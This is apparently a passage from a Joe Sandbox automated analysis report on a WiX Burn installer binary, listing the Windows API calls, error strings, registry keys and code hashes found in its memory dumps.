• d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 0097A90C, 0097A917, 0097A92C, 0097A977
• Failed to allocate unknown element., xrefs: 0097A91D
• Failed to allocate ATOM unknown element value., xrefs: 0097AA2B
• Failed to get unknown element namespace., xrefs: 0097A989
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: FreeString$Heap$AllocateProcess
• String ID: Failed get attributes on ATOM unknown element.$Failed to allocate ATOM unknown element name.$Failed to allocate ATOM unknown element namespace.$Failed to allocate ATOM unknown element value.$Failed to allocate unknown element.$Failed to enumerate all attributes on ATOM unknown element.$Failed to get unknown element name.$Failed to get unknown element namespace.$Failed to get unknown element value.$Failed to parse attribute on ATOM unknown element.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp
• API String ID: 2724874077-2936770743
• Opcode ID: 545b26ceb384580910cd12f17fe82ade180a5c3c353fc793e6a9c3b24a50fd1f
• Instruction ID: ea9472dc9a218c771acd9b4904d8f2e9efde43d3638a0510e69220241af881b5
• Opcode Fuzzy Hash: 545b26ceb384580910cd12f17fe82ade180a5c3c353fc793e6a9c3b24a50fd1f
• Instruction Fuzzy Hash: EA81BF32740715ABDB159B50CC49F6E77B9AFC4B18F128058F609BB2E0EBB09E41CB52
APIs
• CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000200,00000000,?,00000044,?,?,?,?,?), ref: 0091E651
• GetLastError.KERNEL32(?,?,?,?), ref: 0091E65B
• WaitForInputIdle.USER32(?,?), ref: 0091E6BF
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 0091E708
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 0091E71A
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CloseHandle$CreateErrorIdleInputLastProcessWait
• String ID: "%ls"$"%ls" %s$D$Failed to CreateProcess on path: %ls$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$d:\a\wix4\wix4\src\burn\engine\approvedexe.cpp
• API String ID: 1086122317-1885568646
• Opcode ID: 978d0f688995e7e19200799b375a0d68e5162277480fd396da0c6a4d0d4cb175
• Instruction ID: 79ff7bcd2f21a9a656243c6818d61d3fca2f41618d1e6fbc392c86f9a8766db4
• Opcode Fuzzy Hash: 978d0f688995e7e19200799b375a0d68e5162277480fd396da0c6a4d0d4cb175
• Instruction Fuzzy Hash: AF71B272F4021DBBEF12AB90CC46FEEBA79AF04744F004555FE14B62A1E7719E909B90
APIs
• CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,08000080,00000000,?,?,?,?,00000000,00000000), ref: 00950334
• GetLastError.KERNEL32 ref: 00950342
• CreateFileW.KERNEL32(?,40000000,00000007,00000000,00000002,08000080,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?), ref: 009503E5
• GetLastError.KERNEL32 ref: 009503F3
• CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,Function_0003FC40,?), ref: 009504C1
• CloseHandle.KERNEL32(000000FF), ref: 009504D0
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CloseCreateErrorFileHandleLast
• String ID: BA aborted copy of payload from: '%ls' to: %ls.$Failed attempt to copy payload from: '%ls' to: %ls.$Failed to open destination file to copy payload from: '%ls' to: %ls.$Failed to open source file to copy payload from: '%ls' to: %ls.$Failed to prepare payload destination path: %ls$Failed to read from start of source file to copy payload from: '%ls' to: %ls.$copy$d:\a\wix4\wix4\src\burn\engine\apply.cpp
• API String ID: 2528220319-2964528259
• Opcode ID: 45a3f7b6570dfa929473c54c8a16180e938ac145a271eb2b33def32d2c97b8c6
• Instruction ID: 308baa586134f5e1922e8958696fd1c75ab373ceaf6101f13dd5e0b8499bccf2
• Opcode Fuzzy Hash: 45a3f7b6570dfa929473c54c8a16180e938ac145a271eb2b33def32d2c97b8c6
• Instruction Fuzzy Hash: A3514E32B4131977E7318A5A8C4AFAF3968EFC5B61F114548FE18BF1D1E2B49C4187A0
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00916570,?,?,0091E2FF,feclient.dll,?,00000000,00000000,?,?,?,00916C5C,00000000), ref: 0091D854
• GetLastError.KERNEL32(?,?,0091E2FF,feclient.dll,?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091D860
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: ErrorHandleLastModule
• String ID: .wix$.wixburn$Bundle guid didn't match the guid in the PE Header in memory.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get module handle to process.$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$burn$clbcatq.dll$d:\a\wix4\wix4\src\burn\engine\section.cpp
• API String ID: 4242514867-3704064587
• Opcode ID: f5943ae8b8ea6d0f297d12aca0f57a9e55e6eb35c4cb6f74da5842603a384a9c
• Instruction ID: 59268c292bb3ce06cdcb2a040d50515980e31ce6f1f17aff2025fea75e06b2c5
• Opcode Fuzzy Hash: f5943ae8b8ea6d0f297d12aca0f57a9e55e6eb35c4cb6f74da5842603a384a9c
• Instruction Fuzzy Hash: ED517731742318B7D721A6494C4AFEBA5A89F95F24F218029F6196F3C1E2F49D81C7A4
APIs
  • Part of subcall function 0091A8A3: EnterCriticalSection.KERNEL32(00917D5B,WixBundleOriginalSource,?,?,0092F8B4,8D4BE800,WixBundleOriginalSource,?,00000001,00000081,00917D5B,?,00000001,00917DDB,?,?), ref: 0091A8AF
  • Part of subcall function 0091A8A3: LeaveCriticalSection.KERNEL32(00917D5B,00917D5B,00000000,00000000,?,?,0092F8B4,8D4BE800,WixBundleOriginalSource,?,00000001,00000081,00917D5B,?,00000001,00917DDB), ref: 0091A934
• CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,?,WixBundleLastUsedSource,?), ref: 0092F087
• CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,?,WixBundleLastUsedSource,?), ref: 0092F0A4
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CompareCriticalSectionString$EnterLeave
• String ID: Failed to combine last source with relative.$Failed to combine last source with source.$Failed to combine layout source with relative.$Failed to combine layout source with source.$Failed to combine source process folder with relative.$Failed to combine source process folder with source.$Failed to copy absolute source path.$Failed to ensure size for search paths array.$WixBundleLastUsedSource$WixBundleOriginalSourceFolder$d:\a\wix4\wix4\src\burn\engine\cache.cpp
• API String ID: 1408779843-2177830281
• Opcode ID: 3ea5929473a2ffee5962f11618e3980ccb3c17a6eb83660ac8dab552015fbb0f
• Instruction ID: a108b79290b84345e095d5af399fd67cab86e4ddaa9d8b6170bae7d98b760bfc
• Opcode Fuzzy Hash: 3ea5929473a2ffee5962f11618e3980ccb3c17a6eb83660ac8dab552015fbb0f
• Instruction Fuzzy Hash: 73D19F31A80229FBDF21DE50DC5AFEE7AB5AB48720F110175FA04BA2D5D3B4AD40CB91
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00973B63: GetFileSizeEx.KERNEL32(00000000,00000000,?,00000000,?,?,?,0091E202,0100147D,?,?,00000000,00000000), ref: 00973B7B
                                                                                                                                                                    • Part of subcall function 00973B63: GetLastError.KERNEL32(?,?,?,0091E202,0100147D,?,?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 00973B85
                                                                                                                                                                  • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00950457,?,00000000,00000000,?,?,00950457,00000000,00000000,00000000,00000000), ref: 00972DAF
                                                                                                                                                                  • SetEndOfFile.KERNEL32(?,?,00950457,00000000,00000000,00000000,00000000,Function_0003FC40,?), ref: 00972DBB
                                                                                                                                                                  • GetLastError.KERNEL32(?,00950457,00000000,00000000,00000000,00000000,Function_0003FC40,?), ref: 00972DC5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$ErrorLast$PointerSize
                                                                                                                                                                  • String ID: Failed to get size of source.$Failed to read from source.$Failed to reset target file pointer.$Failed to set end of target file.$Failed to write to target.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                                  • API String ID: 1903691966-2291708945
                                                                                                                                                                  • Opcode ID: 639f679022280e432608a36da5afe7e5fc32c4e872f0ca3c4afa88fe7fa3e200
                                                                                                                                                                  • Instruction ID: 42d55a7089880675705480fe9e3691a6c34efa2302897c2a1504667bd9229fa5
                                                                                                                                                                  • Opcode Fuzzy Hash: 639f679022280e432608a36da5afe7e5fc32c4e872f0ca3c4afa88fe7fa3e200
                                                                                                                                                                  • Instruction Fuzzy Hash: CD914272A2022D9BDB328B148C45FEE76B9EF4C740F118095F98DA6294D6B09EC19F94
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to copy download source for pseudo bundle., xrefs: 00955812
                                                                                                                                                                  • Failed to copy id for update bundle., xrefs: 00955917
                                                                                                                                                                  • Failed to allocate space for burn payload group inside of update bundle struct, xrefs: 009556FA
                                                                                                                                                                  • Failed to copy install arguments for update bundle package, xrefs: 0095596A
                                                                                                                                                                  • Failed to allocate space for burn payload inside of update bundle struct, xrefs: 0095573E
                                                                                                                                                                  • Failed to decode hash string: %ls., xrefs: 0095585C
                                                                                                                                                                  • Failed to copy local source path for pseudo bundle., xrefs: 009557DC
                                                                                                                                                                  • Failed to copy cache id for update bundle., xrefs: 00955940
                                                                                                                                                                  • Failed to allocate memory for update bundle payload hash., xrefs: 009558AC
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\pseudobundle.cpp, xrefs: 009556E7, 009556F2, 0095570C, 0095572B, 00955736, 0095586E, 00955899, 009558A4, 0095597C
                                                                                                                                                                  • Failed to copy filename for pseudo bundle., xrefs: 009557B1
                                                                                                                                                                  • Failed to copy key for pseudo bundle payload., xrefs: 00955786
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocateProcess
                                                                                                                                                                  • String ID: Failed to allocate memory for update bundle payload hash.$Failed to allocate space for burn payload group inside of update bundle struct$Failed to allocate space for burn payload inside of update bundle struct$Failed to copy cache id for update bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy id for update bundle.$Failed to copy install arguments for update bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy local source path for pseudo bundle.$Failed to decode hash string: %ls.$d:\a\wix4\wix4\src\burn\engine\pseudobundle.cpp
                                                                                                                                                                  • API String ID: 1357844191-2400517205
                                                                                                                                                                  • Opcode ID: 8cea4391d249b918bf4de3c9ff19382c2e4e6c9a365dde5becc340395c89ecee
                                                                                                                                                                  • Instruction ID: f716950d1ab51d99d0a77f41acd4b502a048ca1d265a54556341c307bf8a64f6
                                                                                                                                                                  • Opcode Fuzzy Hash: 8cea4391d249b918bf4de3c9ff19382c2e4e6c9a365dde5becc340395c89ecee
                                                                                                                                                                  • Instruction Fuzzy Hash: E471C971740B15BBEB21DF698C56FDB7A98EB48B25F020115BE04BB2C1E3B4D85487D1
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0097699C: FindResourceExA.KERNEL32(?,0000000A,?,00000000), ref: 009769AD
                                                                                                                                                                    • Part of subcall function 0097699C: GetLastError.KERNEL32(?,0093D16B,?,00000001,?,?), ref: 009769B9
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000001,?,?), ref: 0093D2CD
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?), ref: 0093D2E2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$ErrorFindLastResource
                                                                                                                                                                  • String ID: Failed to create UI thread.$Failed to create modal event.$Failed to load splash screen configuration.$Failed to read splash screen configuration resource.$Invalid splash screen type: %i$d:\a\wix4\wix4\src\burn\engine\splashscreen.cpp
                                                                                                                                                                  • API String ID: 3960716503-2387003162
                                                                                                                                                                  • Opcode ID: 5678d288bf486aebfb5d522d022ae78a22e2def60eb31692c6ab809b2de3c2fb
                                                                                                                                                                  • Instruction ID: cd1b7fb1e63d935e3e3392a9714026991430915390659632558cd93bc46d3a37
                                                                                                                                                                  • Opcode Fuzzy Hash: 5678d288bf486aebfb5d522d022ae78a22e2def60eb31692c6ab809b2de3c2fb
                                                                                                                                                                  • Instruction Fuzzy Hash: 5E410876A40709BBEB119BA89C46FDF77BDEB88714F100425FA24B72C0E6B4CD408E60
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0096CAFE: RegCloseKey.ADVAPI32(00000000,00000000,00000000,00020019,00000000,00000000,00000000,?,?,00927102,80000002,SOFTWARE\Microsoft\ServerManager,CurrentRebootAttempts,00000000,00916EDE,00000000), ref: 0096CB9B
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00916DEA,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending,00000000,00000000,80000002,SOFTWARE\Microsoft\Updates,UpdateExeVolatile,00000000,00916EDE,80000002,SOFTWARE\Microsoft\ServerManager,CurrentRebootAttempts,00000000,00916EDE,00000000), ref: 009271F8
                                                                                                                                                                  Strings
                                                                                                                                                                  • SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update, xrefs: 00927169
                                                                                                                                                                  • PendingFileRenameOperations2, xrefs: 00927196
                                                                                                                                                                  • SOFTWARE\Microsoft\ServerManager, xrefs: 009270EF
                                                                                                                                                                  • SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending, xrefs: 00927133
                                                                                                                                                                  • SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootInProgress, xrefs: 0092714A
                                                                                                                                                                  • SOFTWARE\Microsoft\Updates, xrefs: 00927119
                                                                                                                                                                  • PendingFileRenameOperations, xrefs: 0092717F
                                                                                                                                                                  • CurrentRebootAttempts, xrefs: 009270EA
                                                                                                                                                                  • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00927184, 0092719B
                                                                                                                                                                  • UpdateExeVolatile, xrefs: 00927114
                                                                                                                                                                  • AUState, xrefs: 00927164
                                                                                                                                                                  • SYSTEM\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 009271B6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: AUState$CurrentRebootAttempts$PendingFileRenameOperations$PendingFileRenameOperations2$SOFTWARE\Microsoft\ServerManager$SOFTWARE\Microsoft\Updates$SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootInProgress$SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending$SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update$SYSTEM\CurrentControlSet\Control\Session Manager$SYSTEM\CurrentControlSet\Control\Session Manager\FileRenameOperations$UpdateExeVolatile
                                                                                                                                                                  • API String ID: 3535843008-3032311648
                                                                                                                                                                  • Opcode ID: 1d0b184a3950c404416ae403810a74516651d900555e5c2ad3eedddf92eb2d0e
                                                                                                                                                                  • Instruction ID: a5b673478ead90616f8c9b1d844ec36c38b5195fae1f079d4cffd9e69fa74c0b
                                                                                                                                                                  • Opcode Fuzzy Hash: 1d0b184a3950c404416ae403810a74516651d900555e5c2ad3eedddf92eb2d0e
                                                                                                                                                                  • Instruction Fuzzy Hash: B931C471E48369B78B31B6E19D45E9FEA7CDED0B44B500556B800B2247DAB0EE10C7B1
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF), ref: 009398F9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                  • String ID: Failed to execute compatible MSI package.$Failed to find package: %ls$Failed to read MSI compatible package id.$Failed to read MSI package id.$Failed to read package log.$Failed to read parent hwnd.$Failed to read rollback flag.$Failed to read variables.$Package '%ls' has no compatible MSI package$Package '%ls' has no compatible package with id: %ls$d:\a\wix4\wix4\src\burn\engine\elevation.cpp
                                                                                                                                                                  • API String ID: 1825529933-1833463798
                                                                                                                                                                  • Opcode ID: 18e23ce2b3bbcbcd76ca6cca751025a309820fc055442d63826d6c100772152b
                                                                                                                                                                  • Instruction ID: bbc42b6c50ba24e48a44cce5b7d9fefc3e358b46743b674a0e38d421a9e9052d
                                                                                                                                                                  • Opcode Fuzzy Hash: 18e23ce2b3bbcbcd76ca6cca751025a309820fc055442d63826d6c100772152b
                                                                                                                                                                  • Instruction Fuzzy Hash: A971C671A40219BBEB22DED5CC4AFEF7A7CEB84B10F110515B605BA1C1D6B49E44CBA0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0091540B: GetProcessHeap.KERNEL32(?,00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 0091541C
                                                                                                                                                                    • Part of subcall function 0091540B: RtlAllocateHeap.NTDLL(00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00915423
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000010,00000001,00000000,00000000,00000000,?,?,?,0094E3CA,?), ref: 0097B63B
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF,?,?,?,0094E3CA,?,00916DA2,00000000,?,00916DA2,00000000), ref: 0097B656
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to allocate default application id., xrefs: 0097B715
                                                                                                                                                                  • type, xrefs: 0097B67D
                                                                                                                                                                  • Failed to allocate memory for update entries., xrefs: 0097B6F9
                                                                                                                                                                  • Failed to reallocate memory for update entries., xrefs: 0097B7C9
                                                                                                                                                                  • http://appsyndication.org/2006/appsyn, xrefs: 0097B62E
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apuputil.cpp, xrefs: 0097B6ED, 0097B721, 0097B7BD
                                                                                                                                                                  • application, xrefs: 0097B648
                                                                                                                                                                  • Failed to allocate default application type., xrefs: 0097B707
                                                                                                                                                                  • Failed to process ATOM entry., xrefs: 0097B7DA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareHeapString$AllocateProcess
                                                                                                                                                                  • String ID: Failed to allocate default application id.$Failed to allocate default application type.$Failed to allocate memory for update entries.$Failed to process ATOM entry.$Failed to reallocate memory for update entries.$application$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apuputil.cpp$http://appsyndication.org/2006/appsyn$type
                                                                                                                                                                  • API String ID: 2664528157-2947066191
                                                                                                                                                                  • Opcode ID: d9a245015d3d6c949c6748ac48cb92fd2ad3d448ef32660c8f2aa9f2d84b07b7
                                                                                                                                                                  • Instruction ID: 08d722b192950e9f4b4e2dfedd929400b5ab9c29720358351151fa0506430df9
                                                                                                                                                                  • Opcode Fuzzy Hash: d9a245015d3d6c949c6748ac48cb92fd2ad3d448ef32660c8f2aa9f2d84b07b7
                                                                                                                                                                  • Instruction Fuzzy Hash: B951F772780705BBDB249B14CCC6F5B77A9ABC1B24F20C518F629AF6D1DBB4E9408B50
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(0097E7C0,00000000,00000008,?,BundleExtensionData.xml,00000001,?,00000000,?), ref: 009201D1
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,BundleExtensionCreate), ref: 009201E8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressLibraryLoadProc
